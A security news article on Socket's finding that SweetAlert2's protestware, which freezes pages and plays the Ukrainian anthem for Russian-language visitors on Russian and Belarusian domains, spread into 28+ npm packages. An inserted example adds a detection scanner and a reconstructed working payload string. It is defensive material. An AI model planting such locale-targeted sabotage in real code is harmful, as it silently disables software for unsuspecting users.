Threat Actors Deploy 28+ Malicious Packages to Spread Protestware Scripts
Socket’s Threat Research Team has discovered a network of at least 28 malicious packages including protestware scripts, totaling approximately 2,000 copies, in a major escalation within the npm supply chain.
These packages, initially flagged in two instances for hidden functionality targeting Russian-language users on Russian or Belarusian domains, have proliferated across the ecosystem.
The protestware, classified under Socket’s alert system, disrupts user interface interactions by disabling mouse events and initiating playback of the Ukrainian national anthem, effectively rendering affected web pages non-functional for specific users.
This development highlights the risks of code reuse in open-source repositories, where undisclosed payloads can cascade through dependencies, amplifying potential impacts on downstream applications.
Discovery of Widespread Protestware
The malicious code manifests as a deeply embedded snippet within packages often exceeding 100,000 lines of code, typically positioned toward the end for obfuscation.
It employs a multifaceted conditional check: verifying the execution environment is a browser (via typeof window !== 'undefined'), confirming the navigator language is Russian (/^ru\b/.test(navigator.language)), and ensuring the hostname matches one of the targeted top-level domains (.ru, .su, .by, or .xn--p1ai).
Upon satisfaction of these criteria, the script leverages localStorage to track initiation timestamps, activating only after a three-day threshold to target repeat visitors.
This results in setting document.body.style.pointerEvents="none" to halt interactions, followed by dynamically creating and appending an audio element sourced from an external URL hosting the anthem, with looped playback initiated after a delay.
Such tactics not only protest geopolitical events but also pose integrity risks in client-side JavaScript environments, potentially violating accessibility standards like WAI-ARIA.
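The trigger chain above (browser check, Russian locale, targeted TLD, localStorage timer, pointer-events kill, injected audio) lends itself to a simple static signature. The following is an added example, not code from Socket or SweetAlert2: a heuristic scanner that flags a JavaScript source only when enough of those indicators co-occur, and reports how far into the file the blocking line sits. The sample payload and storage key are constructed for the demonstration.

```javascript
// Added example (not from the Socket report or SweetAlert2). Each indicator is
// one token of the pattern described in the article; a single hit such as a
// localStorage call is common in benign code, so a file is flagged only when
// several indicators appear together.
const INDICATORS = [
  ['browser-env check', /typeof\s+window\s*!==?\s*['"]undefined['"]/],
  ['Russian locale test', /navigator\.language/],
  ['targeted TLD list', /xn--p1ai/], // punycode .рф is the most distinctive token
  ['localStorage timer', /localStorage\.(?:get|set)Item/],
  ['pointer-events kill', /pointerEvents\s*=\s*['"]none['"]/],
  ['injected audio element', /createElement\(\s*['"]audio['"]\s*\)/],
];

function scanSource(source) {
  const hits = INDICATORS.filter(([, re]) => re.test(source)).map(([name]) => name);
  // Relative offset of the interaction-blocking line (0 = start, 1 = end);
  // the report notes the payload is usually appended near the end of big files.
  const idx = source.search(/pointerEvents\s*=\s*['"]none['"]/);
  const position = idx < 0 ? null : idx / source.length;
  return { hits, position, suspicious: hits.length >= 4 };
}

// Constructed sample mimicking the structure the report describes (not the
// real snippet); the storage key and audio URL are placeholders.
const SAMPLE_PAYLOAD = `
if (typeof window !== 'undefined' && /^ru\\b/.test(navigator.language) &&
    /\\.(ru|su|by|xn--p1ai)$/.test(location.hostname)) {
  var t = localStorage.getItem('initiation-ts');
  if (!t) localStorage.setItem('initiation-ts', String(Date.now()));
  else if (Date.now() - Number(t) > 3 * 86400000) {
    document.body.style.pointerEvents = 'none';
    var a = document.createElement('audio');
    a.src = 'https://placeholder.invalid/anthem.ogg'; a.loop = true;
    setTimeout(function () { a.play(); }, 1000);
  }
}`;

// Constructed benign code: three indicators, but no TLD list or UI blocking.
const BENIGN_SAMPLE =
  "localStorage.setItem('theme', 'dark');\n" +
  "if (typeof window !== 'undefined') console.log(navigator.language);";

module.exports = { INDICATORS, scanSource, SAMPLE_PAYLOAD, BENIGN_SAMPLE };
```

Run scanSource over each file in node_modules (or over a built bundle) and inspect any result with suspicious set, paying attention to a position close to 1.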
Supply Chain Propagation
The protestware’s origins trace back to SweetAlert2, a popular library boasting over 700,000 weekly downloads, which provides customizable dialog boxes as a replacement for native JavaScript popups.
Its maintainer, limonte, has transparently disclosed the functionality since version 11.6.14 published approximately three years ago amid Russia’s invasion of Ukraine and in all subsequent releases up to 11.22.2, including earlier versions like 9.17.3 and 11.6.6.
However, the script has propagated unintentionally to unrelated packages, likely through direct code copying, as evidenced by identical file structures and naming conventions.
This supply chain vulnerability affects diverse projects without any README acknowledgments, underscoring the perils of unvetted code integration.
Notable examples include packages like @starlawfirm/counsel-function (with 284 peak downloads, live across 13 versions), falcon-library-comp (1,822 downloads, versions 0.0.34–0.0.42), and currency_contry_exchange (1,276 downloads, versions 1.2.7–1.7.1), many of which remain active and have seen recent updates, such as @starlawfirm/counsel-function's version 0.0.12 published just 17 hours ago.
Others, like meshcentral (16,895 downloads, versions 1.1.32–1.1.44) and alurkerja-ui (1,521 downloads, spanning 572 versions), demonstrate broader reach, with some deprecated like starlawfirm-counsel-function-test.
According to the report, authors vary from individual developers to teams, with packages created months to years ago, amplifying exposure.
Targeted users primarily include Russian-language speakers on affected domains, though the script’s repeat-visitor logic spares one-off accesses, potentially impacting researchers or global Russian speakers in regions like Kazakhstan or Ukraine.
This cascading effect from SweetAlert2 illustrates how protestware can inadvertently embed in enterprise tools, urging developers to audit dependencies rigorously and employ tools like Socket for proactive threat detection in the npm registry.
As of July 17, 2025, these findings emphasize the evolving landscape of software supply chain attacks, blending activism with technical sabotage.